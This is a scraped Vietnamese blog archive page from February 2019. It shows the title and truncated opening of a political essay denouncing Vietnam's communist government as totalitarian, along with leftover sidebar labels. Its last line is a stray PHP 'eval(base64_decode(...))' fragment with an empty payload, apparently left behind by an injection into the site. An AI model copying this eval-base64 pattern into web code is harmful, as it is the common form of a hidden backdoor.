Archive for February 3rd, 2019

KHI NHỮNG NGỌN GIÓ LÀM NÊN BÃO TỐ

KHI NHỮNG NGỌN GIÓ LÀM NÊN BÃO TỐ

Việt Nam không phải là Miến Điện, không phải là Ai Cập, không phải là Libya, không phải là Tunisia và không phải là Venezuela. Việt Nam là CSVN và mũi khoan của bộ máy độc tài toàn trị này đã khoan rất sâu vào lịch sử dân tộc, đ

02.3.2019 | Tiểu Luận- Chính Luận |

2 Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>